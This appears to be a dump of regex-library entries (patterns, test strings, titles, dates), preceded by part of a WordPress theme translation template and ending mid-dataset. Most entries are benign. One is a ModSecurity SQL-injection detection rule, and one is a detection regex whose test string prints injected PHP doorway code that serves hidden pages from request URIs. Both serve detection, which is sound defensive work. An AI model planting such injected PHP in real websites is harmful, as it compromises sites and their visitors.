Details" msgstr "" #: includes/class-tgm-plugin-activation.php:3603 #: includes/class-tgm-plugin-activation.php:3611 msgid "Hide Details" msgstr "" #: includes/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: includes/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: includes/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: includes/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: includes/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: includes/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: includes/helpers.php:262 includes/helpers.php:281 msgid " " msgstr "" #: includes/helpers.php:269 msgid "Tags:" msgstr "" #: includes/helpers.php:458 msgid "Helpful Links" msgstr "" #: includes/helpers.php:508 includes/helpers.php:511 includes/helpers.php:1603 #: includes/helpers.php:1608 msgid "Home" msgstr "" #: includes/helpers.php:628 includes/helpers.php:1702 msgid "Search results" msgstr "" #: includes/helpers.php:631 includes/helpers.php:1710 msgid "F Y" msgstr "" #: includes/helpers.php:633 includes/helpers.php:1714 msgid "F j, Y" msgstr "" #: includes/helpers.php:642 includes/helpers.php:1815 #, php-format msgid "Category: %s" msgstr "" #: includes/helpers.php:811 msgid "Please enter your name." msgstr "" #: includes/helpers.php:812 msgid "Name " msgstr "" #: includes/helpers.php:824 msgid "Please enter your email address." msgstr "" #: includes/helpers.php:825 msgid "Please enter a valid email address." msgstr "" #: includes/helpers.php:827 msgid "Email " msgstr "" #: includes/helpers.php:836 msgid "Please enter comment." msgstr "" #: includes/helpers.php:837 msgid "Your Comment " msgstr "" #: includes/helpers.php:846 msgid "Website " msgstr "" #: includes/helpers.php:850 msgid "Cancel" msgstr "" #: includes/helpers.php:858 msgid "Post Comment " msgstr "" #: includes/helpers.php:861 msgid "Leave your comment" msgstr "" #: includes/helpers.php:876 msgid "Oops! Page Not Found!" msgstr "" #: includes/helpers.php:877 msgid "" "Sorry, we could not find the page you are looking for. Please click below " "button to back to the Home page." msgstr "" #: includes/helpers.php:878 msgid "Back To Home" msgstr "" #: includes/helpers.php:880 msgid "404" msgstr "" #: includes/helpers.php:1011 msgid "User Avatar" msgstr "" #: includes/helpers.php:1332 msgid "Import Data For Course Setting" msgstr "" #: includes/hooks.php:60 msgid "Custom Widget Area" msgstr "" #: includes/hooks.php:62 msgid "Appears on sidebar of posts and pages" msgstr "" #: includes/hooks.php:125 #, php-format msgid "This theme requires the following plugin installed or update: %1$s." msgid_plural "" "This theme requires the following plugins installed or updated: %1$s." msgstr[0] "" msgstr[1] "" #: includes/hooks.php:126 #, php-format msgid "This theme recommends the following plugin installed or updated: %1$s." msgid_plural "" "This theme recommends the following plugins installed or updated: %1$s." msgstr[0] "" msgstr[1] "" #: includes/hooks.php:127 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgid_plural "" "Sorry, but you do not have the correct permissions to install the %s " "plugins. Contact the administrator of this site for help on getting the " "plugins installed." msgstr[0] "" msgstr[1] "" #: includes/hooks.php:130 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s " "plugin. Contact the administrator of this site for help on getting the " "plugin activated." msgid_plural "" "Sorry, but you do not have the correct permissions to activate the %s " "plugins. Contact the administrator of this site for help on getting the " "plugins activated." msgstr[0] "" msgstr[1] "" #: includes/hooks.php:132 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgid_plural "" "Sorry, but you do not have the correct permissions to update the %s plugins. " "Contact the administrator of this site for help on getting the plugins " "updated." msgstr[0] "" msgstr[1] "" #: includes/hooks.php:134 msgid "Activate installed plugin" msgid_plural "Activate installed plugins" msgstr[0] "" msgstr[1] "" #: includes/hooks.php:137 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: includes/hooks.php:520 msgid "Add Begin Gradient" msgstr "" #: includes/hooks.php:523 msgid "Add start point color for background gradient." msgstr "" #: includes/hooks.php:528 msgid "Add End Gradient" msgstr "" #: includes/hooks.php:531 msgid "Add end point color for background gradient." msgstr "" #: includes/hooks.php:536 msgid "Add Rotate" msgstr "" #: includes/hooks.php:539 msgid "Rotate background gradient (degrees)." msgstr "" #: includes/hooks.php:544 msgid "Add Background Image" msgstr "" #: includes/hooks.php:546 msgid "Background Image." msgstr "" #: includes/hooks.php:964 msgid "" "Sorry we could not log you in. The credentials supplied were not recognised." msgstr "" #: includes/hooks.php:977 msgid "Your account is not correct !" msgstr "" #: includes/hooks.php:997 msgid "Email and Display name are required !" msgstr "" #: includes/hooks.php:1005 msgid "Captcha not found !" msgstr "" #: includes/hooks.php:1022 msgid "Email already exists !" msgstr "" #: includes/hooks.php:1033 msgid "Your account was created ! Please confirm at email " msgstr "" #: includes/hooks.php:1036 msgid "Can not create User !" msgstr "" #: includes/hooks.php:1145 msgid "" "The setup progress of EduChain theme has not yet been completed and can not " "work properly." msgstr "" #: includes/hooks.php:1479 includes/hooks.php:1480 msgid "Setup Educhain" msgstr "" #: includes/menus.php:10 msgid "Top Left Menu" msgstr "" #: includes/menus.php:11 msgid "Top Center Menu" msgstr "" #: includes/menus.php:12 msgid "Top Right Menu" msgstr "" #: includes/menus.php:13 msgid "Main Left Menu" msgstr "" #: includes/menus.php:14 msgid "Main Center Menu" msgstr "" #: includes/menus.php:15 msgid "Main Right Menu" msgstr "" #: includes/menus.php:16 msgid "Bottom menu" msgstr "" #: includes/menus.php:21 msgid "Main menu" msgstr "" #: page-templates/login-page.php:17 msgid "Login page" msgstr "" #: searchform.php:5 searchform.php:60 msgid "Search" msgstr "" #: setup/class-educhain-setup.php:540 msgid "Activated plugin : " msgstr "" #: setup/class-educhain-setup.php:540 msgid " successfully!" msgstr "" #: setup/class-educhain-setup.php:574 setup/class-educhain-setup.php:899 msgid "Active failed!" msgstr "" #: setup/class-educhain-setup.php:578 msgid "Install failed. Reason:" msgstr "" #: setup/class-educhain-setup.php:902 msgid "Alreadt Activated!" msgstr "" #: setup/class-educhain-setup.php:1073 msgid "The URL of your site's homepage." msgstr "" #: setup/class-educhain-setup.php:1078 msgid "The root URL of your site." msgstr "" #: setup/class-educhain-setup.php:1085 #, php-format msgid "Please update your wordpress to version newer than %s." msgstr "" #: setup/class-educhain-setup.php:1089 msgid "Whether or not you have WordPress Multisite enabled." msgstr "" #: setup/class-educhain-setup.php:1091 msgid "Please disable multisite mode." msgstr "" #: setup/class-educhain-setup.php:1095 msgid "Displays whether or not WordPress is in Debug Mode." msgstr "" #: setup/class-educhain-setup.php:1097 msgid "" "Please disable debug mode. This mode is used by developers to test the " "theme. We recommend you turn it off for an optimal user experience on your " "website." msgstr "" #: setup/class-educhain-setup.php:1103 #, php-format msgid "Please config memory limit larger than %sB." msgstr "" #: setup/class-educhain-setup.php:1116 #, php-format msgid "Please update PHP to version newer %s." msgstr "" #: setup/class-educhain-setup.php:1122 #, php-format msgid "Please config Post Max Size larger than %sB." msgstr "" #: setup/class-educhain-setup.php:1128 #, php-format msgid "Please config Time Limit larger than %s." msgstr "" #: setup/class-educhain-setup.php:1134 #, php-format msgid "Please config Max Input Vars larger than %s." msgstr "" #: setup/class-educhain-setup.php:1140 msgid "Please disable or uninstall SUHOSIN." msgstr "" #: setup/class-educhain-setup.php:1143 msgid "Zip Archive" msgstr "" #: setup/class-educhain-setup.php:1144 msgid "" "Zip Archive is required for importing demos. They are used to import and " "export zip files specifically for sliders." msgstr "" #: setup/class-educhain-setup.php:1146 msgid "Please enable Zip Archive." msgstr "" #: setup/class-educhain-setup.php:1152 #, php-format msgid "Please update MySQL to version newer than %s." msgstr "" #: setup/class-educhain-setup.php:1158 #, php-format msgid "Please config Max Upload Size larger than %sB." msgstr "" #: setup/class-educhain-setup.php:1162 msgid "" "Payment gateways can use cURL to communicate with remote servers to " "authorize payments, other plugins may also use it when communicating with " "remote services." msgstr "" #: setup/class-educhain-setup.php:1164 msgid "Please enable fsockopen/cURL." msgstr "" #: setup/class-educhain-setup.php:1195 setup/class-educhain-setup.php:1196 msgid "YES" msgstr "" #: setup/class-educhain-setup.php:1195 setup/class-educhain-setup.php:1196 msgid "NO" msgstr "" #: setup/data-master/views/import_attachments.php:14 msgid "Attachments Import" msgstr "" #: setup/data-master/views/import_attachments.php:19 msgid "From Server" msgstr "" #: setup/data-master/views/import_attachments.php:23 #: setup/data-master/views/import_pages.php:28 msgid "Import" msgstr "" #: setup/data-master/views/import_pages.php:8 msgid "Pages Import" msgstr "" #: setup/layout.php:50 setup/steps/import-theme-setting.php:113 msgid "Continue" msgstr "" #: setup/layout.php:51 setup/steps/welcome.php:19 msgid "Not right now" msgstr "" #: setup/layout.php:60 msgid "Loading..." msgstr "" #: setup/steps/active-plugin.php:67 msgid "Your site will have these features" msgstr "" #: setup/steps/active-plugin.php:69 msgid "" "These are the plugins we include with this theme. Currently Solazu Unyson is " "the only required plugin that is needed to use it. You can activate, " "deactivate or update the plugins from this step." msgstr "" #: setup/steps/active-plugin.php:76 msgid "Required Plugins" msgstr "" #: setup/steps/active-plugin.php:83 setup/steps/active-plugin.php:121 #: setup/steps/import-theme-setting.php:79 msgid "Installed" msgstr "" #: setup/steps/active-plugin.php:86 setup/steps/active-plugin.php:124 #: setup/steps/import-theme-setting.php:82 msgid "Activated" msgstr "" #: setup/steps/check-requirement.php:32 msgid "System check" msgstr "" #: setup/steps/check-requirement.php:33 msgid "Please make sure all requirement are passed" msgstr "" #: setup/steps/check-requirement.php:66 msgid "Required:" msgstr "" #: setup/steps/check-requirement.php:72 msgid "Current:" msgstr "" #: setup/steps/generate-demo.php:19 msgid "Levels" msgstr "" #: setup/steps/generate-demo.php:20 msgid "Tags" msgstr "" #: setup/steps/generate-demo.php:21 msgid "Categories" msgstr "" #: setup/steps/generate-demo.php:22 msgid "Languages" msgstr "" #: setup/steps/generate-demo.php:23 msgid "Instructors" msgstr "" #: setup/steps/generate-demo.php:24 msgid "Courses" msgstr "" #: setup/steps/generate-demo.php:33 msgid "Generate demo" msgstr "" #: setup/steps/generate-demo.php:38 msgid "Check all" msgstr "" #: setup/steps/generate-demo.php:53 msgid "Total items" msgstr "" #: setup/steps/generate-demo.php:53 msgid "( Max 20 items )" msgstr "" #: setup/steps/import-theme-setting.php:45 msgid "Theme setting completed!" msgstr "" #: setup/steps/import-theme-setting.php:46 msgid "Almost of setting tasks have been done with activated plugins below" msgstr "" #: setup/steps/import-theme-setting.php:48 msgid "Theme" msgstr "" #: setup/steps/import-theme-setting.php:62 msgid "Functions / Plugins" msgstr "" #: setup/steps/import-theme-setting.php:66 msgid "Detail" msgstr "" #: setup/steps/import-theme-setting.php:67 msgid "Requirement" msgstr "" #: setup/steps/import-theme-setting.php:112 msgid "Skip this step" msgstr "" #: setup/steps/welcome.php:13 msgid "RubikThemes Setup Wizard" msgstr "" #: setup/steps/welcome.php:14 msgid "" "Welcome to the setup wizard for RubikThemes Theme. You're using RubikThemes " "theme." msgstr "" #: setup/steps/welcome.php:15 msgid "" "Thank you for choosing the RubikThemes from ThemeForest. This quick setup " "wizard will help you configure your new website. This wizard will install " "the required WordPress plugins, default content, logo and tell you a little " "about Help &amp; Support options. It should only take 5 minutes." msgstr "" #: setup/steps/welcome.php:16 msgid "" "No time right now? If you don't want to go through the wizard, you can skip " "and return to the WordPress dashboard. Come back anytime if you change your " "mind!" msgstr "" #: setup/steps/welcome.php:20 msgid "Let's Go!" msgstr ""
Xóa chuỗi không cần thiết khi update file pot
2017-12-05T04:43:40.000Z
(((?:\<|\[)a href=\'|\")?((?:http:\/\/)?((?:www\.)?(?:[\w\d-_]*?\.)+(?:\w{2,4}))(?:\/?)(?:[\w\d-_]+))((?:(?:\'|\")(?:\>|\]))(?:[\w\d-_]+)(?:(?:\<|\[)\/a(?:\>|\])))?)
[a href='http://vk.com/id9025145']ntcn[/a] <a href='http://vk.com/id9025145'>ntcn</a> http://vk.com/id9025145
(((?:\<|\[)a href=\'|\")?((?:http:\/\/)?((?:www\.)?(?:[\w\d-_]*?\.)+(?
2015-09-11T15:46:34.000Z
To convert the BizTalk schema output to one string
\s(?=([^"]*"[^"]*")*[^"]*$)
{ "Activity": "ShortDescription": "01 Emiel Kool BizTallk", "Description": "01 Emiel Kool aangemmaakt via BizTalk", "Properties": "AutoPresent": null, "BPV": false }, "NameSpaces": "NameSpace": "TIO/Activiteiten", "NameSpaceType": "ACTIVITIES", "FromTime": "2015-07-29 00:00:00" }
JSON BizTalk schema output
2015-08-03T12:21:14.000Z
Pattern from `https://raw.githubusercontent.com/SpiderLabs/owasp-modsecurity-crs/v3.0/master/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf`
(?i:(?:,.*?[)\da-f\"'`][\"'`](?:[\"'`].*?[\"'`]|\Z|[^\"'`]+))|(?:\Wselect.+\W*?from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*?\(\s*?space\s*?\())
%7B%22CIA%22:0,%22MM%22:0,%22Fixed%22:0,%22Mortgage%22:0,%22CdnEq%22:50,%22USEq%22:50,%22IntlEq%22:0,%22GlobalEq%22:0,%22RealEstate%22:0,%22Balanced%22:0,%22M10%22:0,%22M15%22:0,%22M20%22:0,%22M25%22:0,%22M30%22:0,%22M35%22:0,%22M40%22:0,%22M45%22:0,%22M50%22:0%7D
ModSecurity 942200
2018-03-09T00:50:41.000Z
tilak filehacker
^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*.{0,100}?\$match\)\)\{\$file\s*=\s*substr\(md5\(strtolower\(.{0,150}?(\@include\(\w+dir\w+\.")\/files\/\$file.{0,90}?\1\/shab.{0,230}?\$match\[1\]\."\.html"\)\)\{echo\s*\@file_get_contents\(.{0,300}?maps\/stmap_"\.\$match\[1\]\."\.xml"\);exit[[:punct:]\s]+$
<?php if(preg_match("/([\w-]+-[a-z0-9]{4})/i", $_SERVER["REQUEST_URI"], $match)){$file = substr(md5(strtolower($match[1])), 0, 3);if(file_exists(__DIR__."/files/$file")){$blocks = array();@include(__DIR__."/files/$file");if(array_key_exists($match[1], $blocks)){@include(__DIR__."/shab");exit;}}}elseif(preg_match("/stmap_([a-zA-Z0-9]+)\.html/i", $_SERVER["REQUEST_URI"], $match)){if(file_exists(__DIR__."/maps/stmap_".$match[1].".html")){echo @file_get_contents(__DIR__."/maps/stmap_".$match[1].".html");exit;}}elseif(preg_match("/stmap_([a-zA-Z0-9]+)\.xml/i", $_SERVER["REQUEST_URI"], $match)){if(file_exists(__DIR__."/maps/stmap_".$match[1].".xml")){header("Content-Type: application/xml");echo @file_get_contents(__DIR__."/maps/stmap_".$match[1].".xml");exit;}}?>
tilak filehacker
2020-04-09T14:18:09.000Z
Regular match an **URL** integration to [Google chat](https://mail.google.com/) by **WebHook**
https?:\/\/chat\.googleapis\.com\/v1\/spaces\/(?P<space_id>[^\/\s$]+)\/messages\?key=(?P<key>[^\s$]+)&token=(?P<token>[^\s&]+)\z
Google chat WebHook integration
2023-12-01T11:06:50.000Z
Working Regex
\x19A(\d*)d\[?(\d*)?\]?(.*)-(\S+)\s(\d+)?\:?(\w*)?\s?\d?\x0c?(.*)?\x18|\x19A(\d*)d(\S*)\s?(\d+)?\:?(\w*)?\s?\d?\x18|RECV,4,(\d*),\[?(\d*)?\]?(.*)-(\S+)\s(\d+)?\:?(\w*)?\s?\d?\%?0?C?(.*)?|RECV,4,(\d*),(\S*)\s?(\d+)?\:?(\w*)?\s?\d?
A0707288dMessage A0707288dMessage 1 A0707288dMessage 1:Cancel 1 A0707288dMessage-Location. 3 A0707288dMessage-Location. 3:Cancel 3 A0707288dMessage-Location. 3 V1 A0707288dMessage-Location. 3:Cancel 3 V1 A0707288d[00]Message-Location. 3 A0707288d[00]Message-Location. 3:Cancel 3 A0707288d[00]Message-Location. 3 V1 A0707288d[00]Message-Location. 3:Cancel 3 V1 RECV,4,0707288,Message RECV,4,0707288,Message 1 RECV,4,0707288,Message 1:Cancel 1 RECV,4,0707288,Message-Location. 3 RECV,4,0707288,Message-Location. 3:Cancel 3 RECV,4,0707288,Message-Location. 3%0CV1 RECV,4,0707288,Message-Location. 3:Cancel 3%0CV1 RECV,4,0707288,[00]Message-Location. 3 RECV,4,0707288,[00]Message-Location. 3:Cancel 3 RECV,4,0707288,[00]Message-Location. 3%0CV1 RECV,4,0707288,[00]Message-Location. 3:Cancel 3%0CV1
TX7470 and RX1
2019-01-14T13:11:04.000Z
<(.|\n)*?>
<div class="tab0">CSS code formatter</div> <div class="tab2">CSS code compressor</div>
HTML - matches specific tag pairs and content between them
2017-04-09T17:38:00.000Z
Extracting all {__("content")} from cakephp .tpl files
{__\("(.*?)"\)}|{__\('(.*?)'\)}
Cakephp smarty translation extract
2014-12-17T11:57:09.000Z
(\d)\d*\1\d*\1
Match 3 Repeating Numbers
2015-08-20T16:07:23.000Z
Match domains of ESET Detection Engine update servers for exclusion from DNS logs
^(?:um01\.cn|um0[1-9]|um1[0-6]|um2[1,3]|(eu\-|us\-)?update)\.eset\.com$
um01.eset.com um02.eset.com um03.eset.com um04.eset.com um05.eset.com um06.eset.com um07.eset.com um08.eset.com um09.eset.com um10.eset.com um11.eset.com um12.eset.com um13.eset.com um14.eset.com um15.eset.com um21.eset.com um23.eset.com um01.cn.eset.com um16.eset.com
ESET Detection Engine update servers (DNS)
2023-06-12T18:57:46.000Z
\[\ \s*[a-z#A-Z_]+\s*-?\d+([\.]\d+)*\s*\ ]
test
espre. ok
2016-09-26T10:24:22.000Z
Proof of concept to omit restriction with '[^{}]' http://stackoverflow.com/questions/15584634/about-php-regexp-for-recursive-pattern?answertab=oldest#tab-top http://stackoverflow.com/questions/25408579/regex-to-match-blocks-inside-blocks
(?= ({%.if (?: (?> (?: (?! {%.if | endif.%}) . )+ )* | (?1) )* endif.%}) ) (?1)
not interested in {% if something %} ---------------- {% if something %} DEEPER {% endif %} {% irgendwas %} {% if something %} DEEPER {% if something %} DEEPEST {% endif %} DEEPER {% endif %} ---- endif ---- {% endif %} not interested in {% if otherthing %} ++++++++++++++++ {% if something %} DEEPER {% endif %} {% irgendwas %} {% if something %} DEEPER {% if something %} DEEPEST {% endif %} DEEPER {% endif %} ++++ endif ++++ {% endif %} not interested in
Recursive search
2014-08-21T15:26:26.000Z
Regex for smartctl output
^\s*(\d{1,3})\s+([\w-]+)\s+(0x[\da-fA-F]{4})\s+(\d{3})\s+(\d{3})\s+(\d+)\s+([\w-]+)\s+(\w+)\s+-\s+(\d+)
ID# ATTRIBUTE_NAME FLAG VALUE WORST THRESH TYPE UPDATED WHEN_FAILED RAW_VALUE 1 Raw_Read_Error_Rate 0x002f 100 100 050 Pre-fail Always - 0 5 Reallocated_Sector_Ct 0x0032 100 100 001 Old_age Always - 0 9 Power_On_Hours 0x0032 100 100 000 Old_age Always - 18322 12 Power_Cycle_Count 0x0032 100 100 001 Old_age Always - 608 170 Reserved_Block_Pct 0x0033 100 100 010 Pre-fail Always - 0 171 Program_Fail_Count 0x0032 100 100 000 Old_age Always - 0 172 Erase_Fail_Count 0x0032 100 100 001 Old_age Always - 0 173 Avg_Block-Erase_Count 0x0032 100 100 000 Old_age Always - 1 174 Unexpect_Power_Loss_Ct 0x0032 100 100 000 Old_age Always - 131 183 SATA_Int_Downshift_Ct 0x0032 100 100 000 Old_age Always - 0 184 End-to-End_Error 0x0032 100 100 000 Old_age Always - 0 187 Reported_Uncorrect 0x0032 100 100 000 Old_age Always - 0 188 Command_Timeout 0x0032 100 100 000 Old_age Always - 597 194 Temperature_Celsius 0x0022 064 056 000 Old_age Always - 36 (Min/Max 16/44) 195 Hardware_ECC_Recovered 0x0032 100 100 000 Old_age Always - 0 196 Reallocated_Event_Count 0x0032 100 100 000 Old_age Always - 0 197 Current_Pending_Sector 0x0032 100 100 000 Old_age Always - 0 198 Offline_Uncorrectable 0x0030 100 100 000 Old_age Offline - 0 199 UDMA_CRC_Error_Count 0x0032 100 100 000 Old_age Always - 0 202 Percent_Lifetime_Remain 0x0030 100 100 001 Old_age Offline - 0 206 Write_Error_Rate 0x000e 100 100 000 Old_age Always - 0 246 Total_LBAs_Written 0x0032 100 100 000 Old_age Always - 582369015 247 Host_Program_Page_Count 0x0032 100 100 000 Old_age Always - 18199054 248 Bckgnd_Program_Page_Cnt 0x0032 100 100 000 Old_age Always - 22876012 180 Unused_Rsvd_Blk_Cnt_Tot 0x0033 000 000 000 Pre-fail Always - 18839 210 RAIN_Success_Recovered 0x0032 100 100 000 Old_age Always - 0 211 Integ_Scan_Complete_Cnt 0x0032 100 100 000 Old_age Always - 738 212 Integ_Scan_Folding_Cnt 0x0032 100 100 000 Old_age Always - 0
smartctl regex
2023-01-22T12:22:24.000Z
(\d*)\t(\d*)\t(\d*)$
1549128572888 5369 8775 1549128572955 5369 8775 1549128573022 5369 8693 1549128573089 5349 8693 1549128573156 5349 8668 1549128573223 5308 8668 1549128573290 5308 8609 1549128573357 5291 8609 1549128573424 5264 8609 1549128573491 5264 8587 1549128573558 5335 8587 1549128573625 5335 8582 1549128573692 5335 8552 1549128573759 5488 8552 1549128573826 5488 8446 1549128573893 5377 8446 1549128573960 5377 8329 1549128574027 5478 8329 1549128574094 5478 8124 1549128574161 5464 8124 1549128574228 5464 7864 1549128574295 5447 7864 1549128574362 5447 7655 1549128574429 6154 7655 1549128574496 6154 7467 1549128574563 6508 7467 1549128574630 6798 7467 1549128574697 6798 7217 1549128574764 6905 7217 1549128574831 6905 6629 1549128574898 6905 6401 1549128574965 7056 6401 1549128575032 7056 6243 1549128575099 7158 6243 1549128575166 7158 5953 1549128575233 7237 5953 1549128575300 7237 5869 1549128575367 7216 5869 1549128575434 7216 6018 1549128575501 7191 6018 1549128575568 7191 6188 1549128575635 7105 6188 1549128575702 7089 6188 1549128575769 7089 6189 1549128575836 7087 6189 1549128575903 7087 6111 1549128575970 7087 6087 1549128576037 7086 6087 1549128576104 7086 6068 1549128576171 7094 6068 1549128576238 7094 6068 1549128576305 7093 6068 1549128576372 7093 6333 1549128576439 7079 6333 1549128576506 7079 6240 1549128576573 7055 6240 1549128576640 7055 6201 1549128576707 6983 6201 1549128576774 6983 6181 1549128576841 6848 6181 1549128576908 6720 6181 1549128576975 6720 6210 1549128577042 6627 6210 1549128577109 6627 6633 1549128577176 6627 7496 1549128577243 6456 7496 1549128577310 6456 8014 1549128577377 6267 8014 1549128577444 6267 8276 1549128577511 5757 8276 1549128577578 5757 8489 1549128577645 5452 8489 1549128577712 5452 8632 1549128577779 5356 8632 1549128577846 5356 8743 1549128577913 5269 8743 1549128577980 5269 8805 1549128578047 5219 8805 1549128578114 5279 8805 1549128578181 5279 8786 1549128578248 5342 8786 1549128578315 5342 8716 1549128578382 5342 8640 1549128578449 5344 8640 1549128578516 5344 8589 1549128578583 5310 8589 1549128578650 5310 8544 1549128578717 5299 8544 1549128578784 5299 8557 1549128578851 5280 8557 1549128578918 5280 8561 1549128578985 5371 8561 1549128579052 5371 8544 1549128579119 5581 8544 1549128579186 5581 8471 1549128579253 5389 8471 1549128579320 5474 8471 1549128579387 5474 8362 1549128579454 5674 8362 1549128579521 5674 8268 1549128579588 5674 7707 1549128579655 5571 7707 1549128579722 5571 7336 1549128579789 5492 7336 1549128579856 5492 6842 1549128579923 6803 6842 1549128579990 6803 6515 1549128580057 6799 6515 1549128580124 6799 6286 1549128580191 7100 6286 1549128580258 7100 5889 1549128580325 7163 5889 1549128580392 7261 5889 1549128580459 7261 5870 1549128580526 7320 5870 1549128580593 7320 5921 1549128580660 7346 5921 1549128580727 7346 6001 1549128580794 7346 5982 1549128580861 7290 5982 1549128580928 7290 5951 1549128580995 7205 5951 1549128581062 7205 5937 1549128581129 7175 5937 1549128581196 7175 5948 1549128581263 7144 5948 1549128581330 7144 6107 1549128581397 7076 6107 1549128581464 7076 6405 1549128581531 7007 6405 1549128581598 6884 6405 1549128581665 6884 6385 1549128581732 6740 6385 1549128581799 6740 6274 1549128581866 6740 6459 1549128581933 6586 6459 1549128582000 6586 7595 1549128582067 6314 7595 1549128582134 6314 8151 1549128582201 5588 8151 1549128582268 5588 8393 1549128582335 5357 8393 1549128582402 5357 8585 1549128582469 5290 8585 1549128582536 5290 8768 1549128582603 5214 8768 1549128582670 5214 8875 1549128582737 5240 8875 1549128582804 5351 8875 1549128582871 5351 8949 1549128582938 5369 8949 1549128583005 5369 8964 1549128583072 5369 8933 1549128583139 5340 8933 1549128583206 5340 8906 1549128583273 5287 8906 1549128583340 5287 8892 1549128583407 5270 8892 1549128583474 5270 8857 1549128583541 5395 8857 1549128583608 5395 8774 1549128583675 5550 8774 1549128583742 5550 8629 1549128583809 5412 8629 1549128583876 5412 8431 1549128583943 5496 8431 1549128584010 5444 8431 1549128584077 5444 8153 1549128584144 5417 8153 1549128584211 5417 7858 1549128584278 5417 7607 1549128584345 5901 7607 1549128584412 5901 7395 1549128584479 6391 7395 1549128584546 6391 7080 1549128584613 6687 7080 1549128584680 6687 6420 1549128584747 6928 6420 1549128584814 6928 6218 1549128584881 7050 6218 1549128584948 7050 5870 1549128585015 7189 5870 1549128585082 7189 5859 1549128585149 7221 5859 1549128585216 7207 5859 1549128585283 7207 5944 1549128585350 7144 5944 1549128585417 7144 6129 1549128585484 7144 6134 1549128585551 7105 6134 1549128585618 7105 6083 1549128585685 7110 6083 1549128585752 7110 6059 1549128585819 7119 6059 1549128585886 7119 6037 1549128585953 7116 6037 1549128586020 7116 6210 1549128586087 7103 6210 1549128586154 7084 6210 1549128586221 7084 6316 1549128586288 6990 6316 1549128586355 6990 6184 1549128586422 6907 6184 1549128586489 6907 6207 1549128586556 6907 6241 1549128586623 6785 6241 1549128586690 6785 6583 1549128586757 6596 6583 1549128586824 6596 7407 1549128586891 6469 7407 1549128586958 6469 7879 1549128587025 6364 7879 1549128587092 6364 8153 1549128587159 6209 8153 1549128587226 6209 8373 1549128587293 5761 8373 1549128587360 5761 8532 1549128587427 5406 8532 1549128587494 5345 8532 1549128587561 5345 8652 1549128587628 5276 8652 1549128587695 5276 8713 1549128587762 5276 8730 1549128587829 5229 8730 1549128587896 5229 8673 1549128587963 5315 8673 1549128588030 5315 8611 1549128588097 5367 8611 1549128588164 5367 8563 1549128588231 5360 8563 1549128588298 5360 8496 1549128588365 5296 8496 1549128588432 5296 8503 1549128588499 5291 8503 1549128588566 5291 8467 1549128588633 5267 8467 1549128588700 5575 8467 1549128588767 5575 8420 1549128588834 5411 8420 1549128588901 5411 8373 1549128588968 5411 8299 1549128589035 5468 8299 1549128589102 5468 8174 1549128589169 5410 8174 1549128589236 5410 8024 1549128589303 5506 8024 1549128589370 5506 7815 1549128589437 6259 7815 1549128589504 6259 7479 1549128589571 6639 7479 1549128589638 6639 7272 1549128589705 6838 7272 1549128589772 6838 6677 1549128589839 6982 6677 1549128589906 7076 6677 1549128589973 7076 6476 1549128590040 7164 6476 1549128590107 7164 6324 1549128590174 7164 5981 1549128590241 7244 5981 1549128590308 7244 5866 1549128590375 7220 5866 1549128590442 7220 5959 1549128590509 7170 5959 1549128590576 7170 6146 1549128590643 7104 6146 1549128590710 7104 6159 1549128590777 7072 6159 1549128590844 7072 6114 1549128590911 7029 6114 1549128590978 7004 6114 1549128591045 7004 6087 1549128591112 7003 6087 1549128591179 7003 6055 1549128591246 6997 6055 1549128591313 6997 6057 1549128591380 6997 6297 1549128591447 7019 6297 1549128591514 7025 6297 1549128591581 7025 6200 1549128591648 7025 6167 1549128591715 7006 6167 1549128591782 7006 6169 1549128591849 6970 6169 1549128591916 6970 6298 1549128591983 6913 6298 1549128592050 6913 6792 1549128592117 6804 6792 1549128592184 6614 6792 1549128592251 6614 7490 1549128592318 6371 7490 1549128592385 6371 8097 1549128592452 6371 8318 1549128592519 6134 8318 1549128592586 6134 8477 1549128592653 5541 8477 1549128592720 5541 8642 1549128592787 5395 8642 1549128592854 5395 8797 1549128592921 5353 8797 1549128592988 5353 8902 1549128593055 5264 8902 1549128593122 5264 8916 1549128593189 5233 8916 1549128593256 5233 8845 1549128593323 5334 8845 1549128593390 5362 8845 1549128593457 5362 8770 1549128593524 5363 8770 1549128593591 5363 8663 1549128593658 5363 8617 1549128593725 5309 8617 1549128593792 5309 8577 1549128593859 5287 8577 1549128593926 5287 8582 1549128593993 5266 8582 1549128594060 5266 8595 1549128594127 5414 8595 1549128594194 5414 8583 1549128594261 5557 8583 1549128594328 5557 8522 1549128594395 5407 8522 1549128594462 5407 8415 1549128594529 5456 8415 1549128594596 5412 8415 1549128594663 5412 8245 1549128594730 5430 8245 1549128594797 5430 8025 1549128594864 5430 7738 1549128594931 6098 7738 1549128594998 6098 7432 1549128595065 6658 7432 1549128595132 6658 7009 1549128595199 6881 7009 1549128595266 6881 6502 1549128595333 7033 6502 1549128595400 7033 6297 1549128595467 7139 6297 1549128595534 7139 5904 1549128595601 7244 5904 1549128595668 7244 5867 1549128595735 7288 5867 1549128595802 7279 5867 1549128595869 7279 6028 1549128595936 7226 6028 1549128596003 7226 6108 1549128596070 7226 6086 1549128596137 7159 6086 1549128596204 7159 6082 1549128596271 7090 6082 1549128596338 7090 6081 1549128596405 7054 6081 1549128596472 7054 6055 1549128596539 7065 6055 1549128596606 7065 6021 1549128596673 7068 6021 1549128596740 7068 6131 1549128596807 7071 6131 1549128596874 7061 6131 1549128596941 7061 6180 1549128597008 7023 6180 1549128597075 7023 6114 1549128597142 7023 6143 1549128597209 6988 6143 1549128597276 6988 6136 1549128597343 6886 6136 1549128597410 6886 6249 1549128597477 